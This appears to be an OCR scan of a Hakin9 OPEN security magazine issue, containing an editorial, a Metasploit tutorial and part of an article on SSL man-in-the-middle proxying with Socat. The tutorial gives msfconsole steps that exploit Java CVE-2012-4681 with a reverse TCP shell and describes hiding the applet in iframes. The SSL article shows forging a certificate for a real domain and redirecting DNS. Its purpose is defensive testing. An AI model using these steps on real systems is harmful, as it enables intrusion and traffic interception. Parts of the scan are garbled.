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Atola Insight 



That's all you need for data recovery. 



Atola Technology offers Atola Insight - the only data recovery device that covers 
the entire data recovery process: in-depth HDD diagnostics, firmware recovery, 
HDD duplication, and file recovery. It is like a whole data recovery Lab in one Tool. 

This product is the best choice for seasoned professionals as well as start-up data 
recovery companies. 



Emphasized features at a glance: 



ATA password removal 

• Very fast imaging of damaged drives 

• Imaging by heads 



all hard drive components 
• Automatic firmware recovery and 



• Automatic in-depth diagnostic of 



Case management 
Real time current monitor 
Firmware area backup system 
Serial port and power control 
Write protection switch 
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Visit atola.com for details 
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DISCLAIMER! 

The techniques described in our 
articles may only be used in private, 
local networks. The editors hold no 
responsibility for misuse of the presented 
techniques or consequent data loss. 



Dear Hakin9 Readers, 

This month we publish Hakin9 OPEN for the first time. Please 
have a look at this new-born issue which we want to be a free of 
charge periodical supporting Hakin9, Hakin9 Extra, Hakin9 On- 
Demand and Hakin9 Exploiting Software. The idea of creating 
this additional issue is to present how wide is the scope of prac- 
tical knowledge from IT security field covered in Hakin9 Issues. 
We want to show the advantages of reading them to those who 
are not our regular readers yet. 

Inside this issue you will find the best articles on leading top- 
ics included in the forthcoming Hakin9 Magazines. We have 
prepared a set of interesting articles provided by experts. 

Shane R. Spencer, the specialist in IT administration and 
programming, writes about the usage of Socat and Wireshark 
for practical SSL protocol reverse engineering. 

Justin C. Klein Keane, an information security specialist 
working at the University of Pennsylvania, describes how to 
use Metasploit for security defense. 

Stefano Braghin shows how to build a framework for organi- 
zation-oriented social networking. 

Mark Painter - HP expert- writes about secure data trans- 
mission standards. 

Ewa Duranc, Hakin9 Editor, will introduce you to Aseem 
Jakhar - the Founder of Nullcon Security Conference, in the 
interview concerning the incoming event. 

Hakin9 OPEN editorial team would like to give special thanks 
to the authors, betatesters and proofreaders. 



We hope that you will enjoy reading the issue! 



Hakin9 Team 
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How to Use Metasploit for Security 
Defense? 



yet controlled intra- as well as inter-organizational in- 
teractions. 



08 



by Justin C. Klein Keane 

In the article author shows that simulating an attack is 
a great way to expose vulnerabilities in your networks, 
but it's also a good way to test defensive countermea- 
sures. Using a tool like Metasploit, defenders can test 
the value of defenses and deploy them with confidence. 
It will also allow defenders to speak about the likelihood 
of specific types of attacks penetrating defenses and 
compromising systems. Using Metasploit, defenders 
can "footprint" attacks and identify patterns that result 
from various classes of attacks, and tune not only their 
prevention countermeasures, but also their detection 
measures. 

How to Use Socat and Wireshark 
for Practical SSL Protocol Reverse 
Engineering? 14 

by Shane R. Spencer 

This article focuses on using an SSL MUM proxy to 
reverse engineer a simple web service. The possibil- 
ity of doing so will be to create your own client that can 
interact with a database behind an unpublished API. 
The software used will be based on the popular Open 
Source Software Socat as well as the widely recognized 
Wireshark. Both are available on most operating sys- 
tems. 

HAKIN9 

How to Build a Framework for 

Organization-Oriented 

Social Networking? 20 

by Stefano Braghin 

In this article we present PriSM, a framework specifi- 
cally designed and implemented to bring the social 
network communication experience to the workplace. 
This is achieved by realizing a simple, secure and 
scalable platform which eases both the access con- 
trol policy management as well as its enforcement in a 
decentralized and delegated fashion, allowing flexible 



Mobile Applications: 

Are you Prepared to Carry the Risk? 



36 



by Mark Painter, Hewlett-Packard Expert 
Secure data transmission standards should be included 
as part of any application's requirements, especially if 
an application is being developed by a third-party. The 
same goes for secure data storage and application log- 
ging. Reasonable inter-application communication ex- 
posure and permissions in application requirements 
should be stringently defined. 

HAKIN9 EXTRA 



How has the Real Cloud Evolved? 



40 



by Eddie Mize 

I deeply suspected this since the concept of the "Cloud" 
became a viable offering, but, the last couple of years 
have allowed me to see specific vulnerabilities in the 
real world and also gain some understanding on how 
they came about. Let me describe the evolution of a 
real "Cloud" provider environment. This environment in- 
cluded over 7,000 servers (bare metal and virtual) and 
was spread over 15 data centers. 

HAKIN9 ONDEMAND 

Interview with Aseem Jakhar 
the Founder of nullcon Security 
Conference 44 

by Hakin9 Team 

Nullcon was founded in 2010 with the idea of provid- 
ing an integrated platform for exchanging information 
on the latest attack vectors, zero day vulnerabilities 
and unknown threats. Their motto - "The next security 
thing" drives the objective of the conference i.e. to dis- 
cuss and showcase the future of information security 
and the next-generation of offensive and defensive se- 
curity technology. The idea started as a gathering for 
researchers and organizations to brain storm and dem- 
onstrate why the current technology is not sufficient and 
what should be the focus for the coming years pertain- 
ing to information security. 
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Hakin9in 2012. 

Accomplishments and statistics 

Dear Hakin9 Readers, 

20 1 2 is nearly over. As usual, we have prepared something extraordinary for you. Some of you are 
new to our magazine and some are with us for months, even years. The end of the world approaches 
rapidly, so we decided that in exchange for your unmeasurable support, you deserve to know the best 
kept secret of the globe - how Hakin9 works. Let us tell you our story which should give you an insight 
into what we have been through this year. 

As for the first order of business, we shall discuss the statistics. This should help you visi 1 
at the magazine and understand the process we have to undergo in order to meet ; 

Run forest, run! 

This year, we have published total of 49 Hakin9 issues - 3442 pages 




Although most of you are familiar with mathematics, I suppose you may not imagine the extent of ^ 
we are dealing with here. Let us portray it to you. 3442 pages equals 204,73 m 2 of paper - this means 
that our articles could cover the floors of a large house. Can you imagine tripping over your child's 1 
and accidentally discovering the way to hack your BIOS password? Or fainting and waking up to learn 
how to solve the "attribution problem?" In such a situation, the popular proverb "you learn something 
new everyday" takes on a completely new meaning. 




Let us weigh in on an another measure. All the issues we published in 20 1 2 put on the scale would 
show 1 37, 1 2 pounds (51,18 kilos) - this is how heavy (or light) would your average girlfriend be. Have 
you ever thought of what would be the best thing in the world? We believe that a partner made of your 
passion would have significant chances in winning such a contest. 



Although, we are sorry, but we have to shatter your dreams - Hakin9 nowadays is released only 



digitally. Unfortunately, you will have to find a real girlfriend :-). Nevertheless, we consider that fact our 
advantage. Even though you will not be able to wear Hakin9 on your soles, you can put your finger on 
it - on your smartphone or Kindle. This way, you can kill the time in long lines, during a layover at the 
airport, or in the mall while your wife is shopping for new shoes, at the same time learning many useful 
things. 

Moreover, the path we chose helps to restore the environment. Throughout the year, our subscribers 
base escalated 1 0 times - from slightly over 200 to 2000 readers. If all these pages were to be published 
in print, we would have to use almost 500 trees, which equals over 27 600 ft 2 . Thanks to you, we have 
saved an impressive park! 




Although we also miss the paper version of Hakin9, we have to greatly thank you for your interest in 
our digital magazines. You have helped to make the world a better place. We have to cherish it for it is 
the only one we have at the moment. You deserve a loud round of applause for not being discouraged, 
"he forests are a bit safer now thanks to you. 



As 




Power in numbers 



you are well aware, we are the number I IT security publication in the world. But to achieve such a 
status, it takes much more than this dignified single digit. J000 ^Z^ 



This year, in order to give you the materials you had a chance to read, we were working over 250 days, 
which equals more than 2000 hours for each employee. These few pages you go through in a couple of 
hours on a monthly basis, have cost our experts almost a 1 000 weeks to prepare. Our beta testers and 
proofreaders have spent a similar amount of time making sure that you will enjoy your reading. Finally, 
our graphic devoted 3000 hours designing the layout to appeal to your eyes. As you can see, a great 
amount of our lives was sacrificed to satisfying your needs. 




O 1 

: 



uring our fight for your right to hack better, we have also suffered losses. As you may guess, our main 
weapon is the computer. Just like in every war, the equipment is exploited heavily and put through 
extreme situations. You may be sure that we have pushed our PCs to their absolute limits. We have 
overheated our processors, filled the hard drives, overused internet connection transfers, etc. Most 
f our inventory have survived, although we cannot deny there were casualties - 1 0 computer mice 
ave passed away during the harsh battles for knowledge. Let them rest in peace. Finally, our battle 
cry - "HACKING", has been used over 5 million times. Some of us (including one of the authors of this 
article) suffered severe throat damages due to that fact. 



roat a< 



Where would we be. 



...if it wasn't for you? Probably we would grow beards and stand in long cues for our welfare check. 
Or maybe in the psychiatrists' offices whining on how we are useless. As long as we have our precious 
readers, we have a purpose. We owe you a huge THANK YOU. Everything we do, we do with you 
in our minds. We are grateful for every comment and opinion, either positive or negative. We have 
analyzed every sign of your discontent and every time we were even more motivated to increase the 
quality of our product. Every word from you lets us improve Hakin9 and brings us closer to the ideal 
shape of our magazine, or shall we say - your magazine. Thank you Hakin9 fans for your invaluable 
support and contribution. We owe you one. 
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How to Use Metasploit 

for Security Defense 



If you've ever taken any training about penetration testing, or 
read almost any book or online article about the trade, youVe 
heard of Metasploit Years ago, before penetration testing was 
a recognized professional field, exploiting a vulnerability was 
often an extremely onerous task. 



dentifying a vulnerability might be as easy as 
fingerprinting a system then searching public 
mailing lists, but finding exploit code was often 
difficult. In many cases, researchers would release 
"proof of concept" exploit code that demonstrated 
a vulnerability, but did little more than launch the 
calc.exe program or other harmless activity. Fur- 
thermore, exploit code was often unreliable and 
required specific environments to build and com- 
pile. Thus, a vulnerability tester had to fingerprint 
systems, hunt across the internet and mailing lists 
for exploit code, create systems upon which to 
build and compile the code, then execute the code 
against target systems, and, with fingers crossed 
and baited breath, hope that the exploit worked. 

The situation was frustrating, and untenable for a 
professional class of penetration testers who want- 
ed reliable, easy to access, exploit code to use pro- 
fessionally. Thus, Metasploit was born, as a frame- 
work to support standardized, tested exploit code. 
With Metasploit, exploit code could be packaged in- 
to "modules" in order to ensure they would work with 
the framework. Users of Metasploit only needed to 
ensure that Metasploit itself would run on a system, 
and exploits could be crafted for Metasploit, rather 
than having to rely on a testing lab full of machines 
of various architectures running several different 
operating systems in order to compile exploit code 
successfully. With Metasploit, testers could turn to 
a trusted tool and have confidence that modules in- 
cluded in the framework would work as advertised. 



Metasploit for Defense 

Metasploit has long since become the indus- 
try standard for offensive security and penetra- 
tion testing. It is robust, flexible, and reliable, all of 
which make it a favorite among practitioners. Us- 
ing Metasploit for defensive tasks may seem a little 
counter intuitive. Why would a network security en- 
gineer, say, be interested in an attack tool? There 
are many good answers to these queries. In this 
article I'll propose rather timely example. Recently, 
Oracle's Java implementation was demonstrated 
to have a vulnerability that allowed anyone using 
a web browser to be compromised, remotely, sim- 
ply by viewing a web page (CVE-201 2-4681). This 
vulnerability allowed a maliciously crafted Java ap- 
plet to compromise the Java Virtual Machine (JVM) 
on client machines, and execute arbitrary code as 
the currently logged on user. This was extreme- 
ly damaging, because at the time the vulnerability 
became public, there was no supported fix from 
Oracle (the flaw was a 0-day, that is a vulnerability 
for which no fix exists). This meant that any attack- 
er leveraging the exploit could take over a victim 
machine and there was little defenders could do. 
In short order a Metasploit module was released. 

As expected, there was much wailing and gnash- 
ing of teeth amongst network security defense 
professionals. When new vulnerabilities become 
public the first thing organizations usually want 
to measure is their own level of exposure. With- 
out specific detail it is difficult to justify expense to 
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remediate a problem. For instance, with the Java 
vulnerability, would it be worth the effort to craft in- 
trusion detection alerts so that security staff were 
notified whenever a Java malicious applet was ac- 
cessed, and if so how would one determine how to 
write such a rule. Similarly an organization might 
want to decide if they needed to turn off Java in all 
web browsers, and how that effort would measure 
against the potential risk. 

Knowing the level of exposure and being able to 
concretely address concerns from management 
about a particular risk is an extremely difficult task 
for most defenders. Tools like Metasploit allow de- 
fenders to test exploits against their current sys- 
tem builds and answer these questions. By using 
a tool that allows defenders to actively gauge the 
effectiveness of countermeasures, the likelihood 
of exploit success, and the impact of such an ex- 
ploit can help organizations craft measured, effec- 
tive responses to vulnerability announcements like 
CVE-20 12-4681. 

Getting Started with Metasploit 

Metasploit is a rather large and complex software 
program. It contains a number of tools and can 
be extremely intimidating for a beginner. It is not 
a tool that is inviting to the casual user in order to 
develop familiarity. Rather, operators must under- 
stand Metasploit, its proper use, capabilities, and 
limitations, in order to get maximum value from the 
framework. 

Getting started with Metasploit begins with 
downloading the latest version of the framework 
from Metasploit.com. There are two versions avail- 
able, a free and a commercial version. Metasploit 
was completely free and open source until it was 
acquired by Rapid7, which then began offering a 
commercial version of the tool with extended capa- 
bilities and support. The free version remains the 
flagship, however, so there is no need to fear that 
using the free version will somehow hamper test- 
ing capabilities. The commercial version includes 
extra features for enterprises, so if you plan to use 
Metasploit on any sort of regular basis it is worth 
investigating. 

Architecture 

Metasploit is a complete framework, programmed 
in Ruby. Don't' worry if you don't know how to pro- 
gram, or how to code in Ruby, the framework takes 
care of most of the common tasks most testers 
would be interested in. 

Metasploit includes a number of additional tools 
in addition to the framework itself. You'll notice if 
you look in the install directory that there are com- 



plete versions of Java, Ruby, and PostgreSQL as 
well as Metasploit. These technologies support the 
framework and the various tools that come with 
Metasploit. Most of this should occur behind the 
scenes. 

Installation 

The Metasploit download is fairly straightforward. 
You can install Metasploit on Windows or Linux, or 
even use it in a pre-configured environment such 
as on the BackTrack Linux distribution. For the 
purposes of this article we'll explore installation of 
Metasploit on a Windows XP system as a sort of 
lowest common denominator. However, using the 
tools in Metasploit that require integration with sep- 
arate technologies (such as Java or PostgreSQL) 
may be easier with a preconfigured distribution. 

To get started point a browser at the Metasploit 
website {http://www.metasploit.com), navigate to 
the download section, and choose the version of 
Metasploit that fits your operating system (Figure 1 ). 

Once the download is complete be aware that you 
may get a number of warnings about Metasploit from 
your browser, operating system, and/or anti-virus 
software. Metasploit contains exploit code, by defi- 
nition it is hostile, so your machine is right to identify 
this code as malicious. If you don't get any warnings 
that is likely an indication that your computer's de- 
fenses may need a little attention (Figure 2). 

Open the downloaded installer and run it on your 
machine. You may need to add an exception to your 
anti-virus software to exclude the Metasploit installa- 



<- CD www.metasploit.com/du - : ad/ 



WindowsXP (Snapshot 2) [Running] 



(J metasploit 8 



it 




TTiankyou for downloading MetiE:: : : 

Your download will begin in a moment. 



Getf 
Next 



* Showall dovrirads... 



Figure 1. The Metasploit download site 



This product is not compatible with common anti-virus solutions, Before continuing., please disable any installed 
anti-virus software or add an exclusion for the Metasploit installation directory, Failure to do so can lead to a corrupt 
installation and the malfunctioning of certain exploit modules. 



Figure 2. Installation warning of exploits 
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tion directory (C:\metasploit) in order for the install to 
complete. Similarly, you may get warnings that your 
machines firewall could interfere with the operation 
of Metasploit. This is mainly due to the fact that ma- 
ny Metasploit payloads require that targets be able 
to connect back to your machine. Careful manipu- 
lation of your firewall to allow these ports is a wiser 
approach than disabling the firewall entirely, but be 
aware that this could cause issues. Once you have 
stepped through any warnings begin the installer. In- 
stallation will require you to accept the license agree- 
ment, decide on an installation directory, choose an 
SSL port on which to serve Metasploit, decide on a 
name for the server and the server's certificate vali- 
dation timespan. In most cases the default options 
for the installation are sufficient (Figure 3). 

Up and Running 

There are several common ways to interact with 
the framework, all included in the install. The first 
is the console, which you can find under Start -> 



Mmetasploif 



■ Eliminate fa 
► Upgrade to 



-3 Initializing database 











unpacking rues 



I 



Cancel 



Figure 3. Metasploit installing 
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[*] Please wait while the Metasploit Pro Console initializes 
[*] Starting Metasploit Console... 
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[*] Successfully loaded plucjin: pro 
m3f > | 
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Figure 4. The Metasploit console 



Metasploit -> Metasploit Console. This is the com- 
mand line tool that you use to interact with the 
framework. The other two common ways to con- 
nect are Armitage, which is a Java based GUI tool 
for using Metasploit, MSFGUI, and the Web Ul. 
I have found that the console is by far the most 
direct, efficient, and reliable way to interact with 
Metasploit. In fact, some exploits that seem to 
work perfectly in the console have not functioned 
properly when started from the Web Ul (such as 
the Java CVE-201 2-4681 exploit) (Figure 4). 

Once installed, Metasploit can be utilized in a 
number of ways. The most direct way to interact 
with Metasploit is via the command line, using the 
msfconsole. The console can be intimidating for 
novice users, but it exposes all of the power and 
capabilities of the Metasploit framework, so it is 
worth exploring in order to develop proficiency. 

Getting Started 

Getting started with the Metasploit Console can 
be somewhat perplexing. There is no easy way 
to navigate other than by using text based com- 
mands and some commands are extremely clunky 
(for instance, some commands might produce a 
large volume of output that will flash by the screen, 
but the scroll history of the Console won't let you 
scroll up and actually see all the output). Despite 
these shortcomings, the full power and flexibility 
of Metsaploit is available from the Console, so de- 
veloping proficiency is time well spent. It is worth 
being aware that this may take some investment, 
however, to avoid initial frustration and fatigue with 
the tool. 

Before you get started with the Console it is im- 
portant to make sure that you update Metasploit so 
that you're using the latest version of the framework 
with the newest exploits. The installer download- 




Figure 5. Metasploit update downloads new modules 
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ed from the website may not include recently re- 
leased exploit modules. The update program can 
be found under Start -> Metasploit -> Framework 
-> Framework Update. This will open a console 
window and check for the newest version of the 
software (Figure 5). 

Once you're sure your version of the framework 
is up to date you can get started with the Console. 
The first command that you should learn in the 
Console is the 'help' command. This will list out all 
of the commands that you can use in the console. 
There are quite a number of commands. To get 
more information about a command you can type 
'help' followed by the command you're interested 
in (such as 'help banner') (Figure 6). 

To find exploits you'll need to utilize the 'search' 
command. To list all the exploit modules in Metasploit 
you can simply type 'show', but as mentioned be- 
fore, this is of little use since the Console will dis- 
play far too many modules for the interface to actu- 
ally display. Instead, try using the 'search' command 
and searching for Java vulnerabilities by typing 
'search java'. You'll notice that even just searching 
for this one phrase lists quite a number of results. 

When searching for Java modules one also quick- 
ly notices that there are different types of modules 
listed - auxiliary, exploit, and payload. We'll be in- 
terested in the exploit modules in order to craft a 
malicious Java applet, and the payload modules to 
craft our malware payload that will execute when- 
ever a vulnerable machine accesses the applet. To 
search for exploits specific to the vulnerability we 
want to test type 'search cve:201 2-4681'. Alterna- 
tively you can use the Metasploit website to search 
for exploits and find useful descriptions, including 
usage documentation at http://www.metasploit. 
com/modules (Figure 7). 
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Crafting the Exploit 

To begin building our exploit we'll have to tell 
Metasploit which module to use. To do this simply 
type 'use' followed by the name of the exploit (re- 
member, you can type 'help use' to get an example 
of how to execute the 'use' command). In this case 
we'll type in 'use exploit/multi/browser/javaJre17_ 
exec' in order to start using the exploit. You'll notice 
that the Console prompt changes so that you know 
which exploit you're using (Figure 8). 

Now that we're using the desired exploit we have 
to provide instructions for Metasploit to craft our 
malicious payload. So far Metasploit knows we 
want to use the Java 1.7 vulnerability to craft an 
exploit, but once Metasploit takes advantage of the 
vulnerability it needs to understand what instruc- 
tions we want to execute on the victim computer. 
For this example, we will create a payload that 
spawns a reverse shell. A reverse shell is a com- 
mand prompt that we can access locally, but which 
actually executes commands on the target system. 
We can choose a number of payloads that we can 
explore using the 'show payloads' command. 

To select the payload type in 'set PAYLOAD java/ 
shell/reverse_tcp' and hit enter. This will set up a 
payload in the applet that will execute and "shov- 
el" a shell over TCP back to our machine. In order 
for the payload to work we need to tell Metasploit 
the IP address of the machine to connect back to. 
To do this type in 'set LHOST [ip_address]' where 
[ip_address] is the IP of your machine. Once this 
information is entered we're ready to begin. Simply 
type in 'exploit' to start the exploit (which spawns 
a web server listening at a specific URL detailed 



1*1 Metasploit Console 




Figure 6. Metasploit Console help command 



Figure 7. Using the Metasploit Console search command 



insf > use exploit/imilti/browser/ java_jrel7 
insf exploit (java jre!7 exec) > |~~ 



Figure 8. Metasploit Console prompt changes to show the 
exploit 
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in the Console output that will deliver our payload 
when accessed) (Figure 9). 

Testing the Exploit 

Setting up a test machine may be a little tricky. 
You'll have to ensure that Java is installed on the 
machine, but you need an older, vulnerable ver- 
sion. Older versions of Java are available from Or- 
acle, for testing purposes. You can find older ver- 
sions at http://www.oracle.com/technetwork/java/ 
archive-139210.html or generally looking for Java 
Downloads and then following the link to Previ- 
ous Releases. Using Java 1.7.0_6 should be suf- 
ficient. To determine the version of Java you have 
installed type 'java -version' at the command line. 

In your test machine, pull up a web browser and 
type in the address of the Metasploit server. This is 
a somewhat contrived way to access the malicious 
applet. In the wild, applets such as this are gener- 
ally included in hidden iframe tags that are inserted 
into otherwise innocuous web pages. The exploit 



r*1 Metasploit Console 




1 File Edit View Help 


s=a - p m I IB I @ m 




va Reverse HTTP Stager 




va Reverse HTTP 5 Stager 




va Reverse TCP Stager 
java/ shell/bind tcp 

Bind TCP Stager 

java/ she 11/ reverse tcp 

Reverse TCP Stager 

java/ she 11 reverse tcp 

Reverse TCP Inline 


normal Command Shell, Java 
normal Command Shell, Java 
normal Java Command Shell, 


msf exploit (java jrel7 exec) > set PAYLOAD java/ 
PAYLOAD => java/ she 11/ reverse tcp 

msf exploit (java jrel7 exec) > set LHOST 10.10.0 
LHOST => 10. 10.0.50 

msf exploit (java jrel7 exec) > exploit 
[*] Exploit running as background job. 

[*] Started reverse handler on 10.10.0.50:4444 


shell/reverse tcp 
.50 


[*] Using URL: http : //0 . 0 . 0 . 0 : 8080/8f 17 jPC 
[*] Local IP: http : // 10 . 0 . 2 . 15 : 8080/8f 17 jPC 
[*] Server started. 
1 




jRead^^ 


|25x80 



Figure 9. Metasploit exploit started 




can be further hidden by obfuscating the reference 
using JavaScript and functions that encode and 
decode data so that anyone observing the HTML 
source code of an infected web page would see 
nothing but gibberish code that web browsers can 
easily decode and execute but which is more diffi- 
cult for human eyes to parse (Figure 10). 

Calling the URL from your test machine should 
only result in a blank screen (or in this case a warn- 
ing that the Java plugin is out of date, which, kudos 
to Oracle, should nag most users into updating). 
The only indication that the exploit has been suc- 
cessful will appear in the Metasploit Console (Fig- 
ure 11). 

Once you see the indication that the stage has 
been sent you can check to see if a session is avail- 
able. To do this, in the Console, hit enter to get back 
to a prompt. Next, type in 'sessions' to see the ac- 
tive sessions that are available. You should see an 
indication that the reverse shell is up and listening. 



f* 1 Metasploit Console 




BOB 


1] File Edit View Help 


ca - p m | C I < 


i ® 


^ — 




Figure 1 1 . Metasploit console shows the target has been 
exploited 
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Figure 1 0. Vulnerable machine being exploited via malicious Figure 1 2. Metasploit shows the actively exploited machines 
Java applet as sessions 
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Note the £ ld' of the session, as you need this infor- 
mation to connect to the session (Figure 12). 

Once a session is established we can interact 
with the session by typing in 'sessions -i [id]' where 
[id] is the id number noted previously. There are a 
number of session commands that you can explore 
using the 'help sessions' command. As soon as you 
enter interactive mode you'll notice the command 
prompt will change to the familiar MS-DOS prompt 
and you can type commands as though you were 
logged into the target computer (Figure 13). 

Production Use 

Establishing a proof of concept is useful in confirm- 
ing that your Metasploit exploit will actually work. 
Putting it into practice in the wild is the next step. 
You'll want to have Metasploit installed on a ma- 
chine that is accessible in your environment, and 
then start up the exploit so it is serving from the 
server. Next, placing a reference to the Metasploit 
applet in an iFrame on an intranet site or other 
page that you know users in your environment will 
access will allow you to test infection rates. Check- 
ing the console periodically will allow you to see 
IP addresses of users who are vulnerable to the 
exploit. 

A better plan is to simply observe what configura- 
tions fall victim to the Metasploit exploit and what 
configurations do not, then adjust your produc- 
tion systems to protect them. Many antivirus prod- 
ucts will detect the Metasploit payload and stop it, 
which is reassuring in that you can be confident 
that your AV solution will detect Metasploit attacks. 
A better solution is a configuration that denies Java 
from actually attempting to execute the malicious 
applet. For instance, white listing sites upon which 
Java can execute can greatly limit scope. 



Conclusions 

The ability to test exploits against systems in your 
environment is a tremendous advantage. Using 
Metasploit you can easily, and extremely accurate- 
ly gauge your exposure to compromise. The Java 
1.7 vulnerability (CVE-201 2-4681) is just one ex- 
ample. Metasploit includes hundreds of modules, 
including some that will test misconfiguration in ad- 
dition to vulnerabilities. There are modules that will 
perform brute force attacks to do things like test 
the strength of passwords on your SQL servers in 
addition to target enumeration modules that will 
perform ping sweeps, find hosts on your network 
vulnerable to idle scanning, and more. 

Hopefully this brief tutorial has convinced you 
that Metasploit has value to system defenders as 
well as penetration testers. Simulating an attack is 
a great way to expose vulnerabilities in your net- 
works, but it's also a good way to test defensive 
countermeasures. Using a tool like Metasploit, de- 
fenders can test the value of defenses and deploy 
them with confidence. It will also allow defenders 
to speak about the likelihood of specific types of 
attacks penetrating defenses and compromising 
systems. Additionally, using Metasploit, defenders 
can "footprint" attacks and identify patterns that re- 
sult from various classes of attacks, and tune not 
only their prevention countermeasures, but also 
their detection measures (could your network spot 
a reverse shell spawning from one of the internal 
workstations?). For all of these reasons Metasploit 
should definitely be a part of any internal security 
team's toolkit. 



r* 1 Metasploit Con; 




Figure 13. Using Metasploit to type commands on the 
exploited target 
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How to Use 

Socat and Wireshark 

for Practical SSL Protocol Reverse Engineering? 

Secure Socket Layer (SSL) Man-ln-the-Middle (MITM) proxies 
have two very specific purposes. The first is to allow a client 
with one set of keys to communicate with a service that has a 
different set of keys without either side knowing about it. This is 
typically seen as a MITM attack but can be used for productive 
ends as well. The second is to view the unencrypted data for 
security, educational, an reverse engineering purposes. 



For instance, a system administrator could 
set up a proxy to allow SSL clients that don't 
support more modern SSL methods or even 
SSL at all to get access to services securely. Typi- 
cally, this involves having the proxy set up behind 
your firewall so that unencrypted content stays 
within the confines of your local area. 

Being able to analyze the unencrypted data is 
very important to security auditors as well. A very 
large percentage of developers feel their services 
are adequately protected since SSL is being used 
between the client and the server. This includes 
the idea that if the SSL client is custom closed 
source software that the protocol will be unbreak- 
able and therefore immune to tampering. If you're 
investing your companies funds using a service 
that could easily be subject to tampering then you 
may end up with a nasty surprise. Lost funds per- 
haps or possibly having your account information 
publicly available. This article focuses on using an 
SSL MITM proxy to reverse engineer a simple web 
service. The purpose of doing so will be to create 
your own client that can interact with a database 
behind an unpublished API. The software used will 
be based on the popular open source software So- 
cat as well as the widely recognized Wireshark. 
Both are available on most operating systems. 

Lets Get Started! 

We will be reverse engineering a LiveJournal client 
called Logjam which supports SSL connections 



to the LiveJournal API servers. Since this article 
is purely educational we don't mind getting some 
experience using the LiveJournal API which al- 
ready public and Logjam which is a free and open 
source project. 

Prerequisites 

• Install Socat - Multipurpose relay for bidirec- 
tional data transfer: http://www.dest-unreach. 
org/socat/ 

• Install Wireshark - Network traffic analyzer: 
http://www. wireshark. org/ 

• Install OpenSSL - Secure Socket Layer (SSL) 
binary and related cryptographic tools: http:// 
www. openssl. org/ 

• Install TinyCA - Simple graphical program for 
certification authority management: http://ti- 
nyca. sm-zone.net/ 

• Install Logjam - Client for LiveJournal-based 
sites: http://andy-shev.github. com/LogJam/ 

Generating a False SSL Certificate 
Authority (CA) and Server Certificate 

The API domain name for LiveJournal is simply 
www.livejournal.com and any SSL compliant client 
software will require the server certificate to match 
the domain when it initially connects to the SSL 
port of the server. 

An SSL CA signs SSL certificates and is noth- 
ing more than a set of certificates files that can be 
used by tools like OpenSSL to sign newly gener- 
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ated certificates via a certificate signature request 
(CSR) key that is generated while creating new 
server certificates. The client simply needs to trust 
the certificate authority public key and subsequent- 
ly the client will trust all server certificates signed 
by the certificate authority private key. 

Generating a certificate authority 

Run tinyca2 for the first time and a certificate au- 
thority generation screen will appear to get you 
started (Figure 1). 

It doesn't matter what you put here if you don't 
plan on keeping this certificate authority information 
for very long. The target server at LiveJournal.com 
will never see the keys you are generating and they 
will stay completely isolated to your testing environ- 
ment. Be sure to remember the password since it 
will be required for signing keys later on. 

Select Export CA from the CA tab and save a 
PEM version of the public CA certificate to a new 
file of your choosing. 

Generating a server certificate 

Click on the Requests tab in TinyCA and then the 
New button that will help us create a new certificate 
signing request and private server key (Figure 2). 

The common name must be www.livejournal. 
com. The password can be anything and we will 
be removing it when we export the key for use. 



Name (for local storage]: 

Data for CA Certificate 
Common Name (for the CA): 

Country Name (2 letter code): 

Password (needed for signing): 

Password (confirmation): 

State or Province Name: 

Locality Name (eg, city): 

Organization Name (eg, company): 

Organizational Unit Name (eg. section): 

eMail Address: 

Valid for (Days): 

Keylength: 

Digest: 



Create a new CA 

| Yoyo dyne 



Yoyodyne Propulsion Systems 



US. 



San Narciso 



Yoyodyne 



Information Technology 



info @yoyo dyne 



3650 

O 1024 O 2048 ® 4096 

© SHA-1 O MD2 O MDC2 O MD4 O MD5 O RIPEMD-160 



OK 



J$ Cancel 



Figure 1 . TinyCA new certificate authority window 


Create a 


new Certificate Request 


Common Name (eg, your Name, 


www.livejournal, com 


your eMail Address 
or the Servers Name) 




eMail Address: 




Password (protect your private Key): 


•••• 


Password (confirmation): 


•••• 


Country Name (2 letter code): 


US 


State or Province Name: 


California 


Locality Name (eg, city): 


San Narciso 


Organization Name (eg, company): 


Yoyodyne 


Organizational Unit Name (eg, section): 


Information Technology 


Keylength: 


® 4096 O 1024 O 2048 


Digest: 


® SHA-1 O MD2 O MDC2 O MD4 O MD5 O RIPEMD-160 


Algorithm: 


® RSA O DSA 



<5ok 



Under the Requests tab there is now a certifi- 
cate named www.livejournal.com that needs to be 
signed. Right click and select Sign Request and 
then Sign Request Server. Use the default values 
to sign the request. 

Now there will be a new key under the Key tab 
now. Right click on it and select Export Key and 
you'll be presented a new dialog (Figure 3). 

As seen in the figure you want to select PEM 
(Key) as well as Without Passphase (PEM/ 
PKCS#12) and Include Certificate (PEM). Doing 
so will export a PEM certificate file that contains 
a section for the certificate key as well as the cer- 
tificate itself. The PEM stanard allows us to store 
multiple keys in a single file. 

Congratulations, you now have a perfectly val- 
id key for https://www.livejournal.com as long as 
the web server running the site is under your own 
control and uses the server key you've generated. 
Trusting the key is the tricky part. 

Allow logjam to trust the certificate authority 

So we have to dig in a bit to understand what SSL 
Certificate trust database Logjam will be using. 
Most Linux based GTK and console programs rely 
on OpenSSL which has it's own certificate author- 
ity database that is very easy to add a new certifi- 
cate to. 

In Debian/GNU Linux the following will install 
your new Yoyodyne CA certificate system wide: 
Listing 1. 

Now Logjam as well as programs such as wget, 
w3m, and most scripting languages will trust all 
keys signed by your new CA. 

Using Socat to Proxy the Stream and 
Hijacking your own DNS 

Socat is basically a swiss army knife for commu- 
nication streams. With it you can proxy between 
protocols. This includes becoming an SSL aware 
server and proxying streams as an SSL aware cli- 
ent to another SSL aware server 



Export Key to File 

File: f WJ MIIJ.MimiMmiJ.J Browse . . 
Export Format: 

® PEM (Key) 



O DER (Key without Passphrase) 
O PKCS#12 (Certificate & Key) 
O Zip (Certificate & Key) 
O Tar (Certificate & Key) 
Without Passphrase (PEM/PKCS#12) 
® Yes O No 

Include Certificate (PEM) 
® Yes O No 



Sa 



I Cancel 



Figure 2. TinyCA new certificate request window 



Figure 3. TinyCA private key export window 
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Set up your system and start up socat 

Since we should aim for transparency we will need 
to intercept DNS requests for www.livejournal.com 
as well so that our locally operated proxy running 
on port 443 on ip 127.0.2.1 is in the loop. 

First, we will need to know the original IP of www. 
livejournal.com: 

spencersr@bigboote : ~$ nslookup www.livejournal.com 

8.8.8.8 
Server: 8.8.8.8 
Address: 8.8.8. 8#53 
Non-authoritative answer: 
Name: www.livejournal.com 
Address: 208.93.0.128 

Bingo! Now add the following line to /etc/hosts 
near the other IPv4 records: 



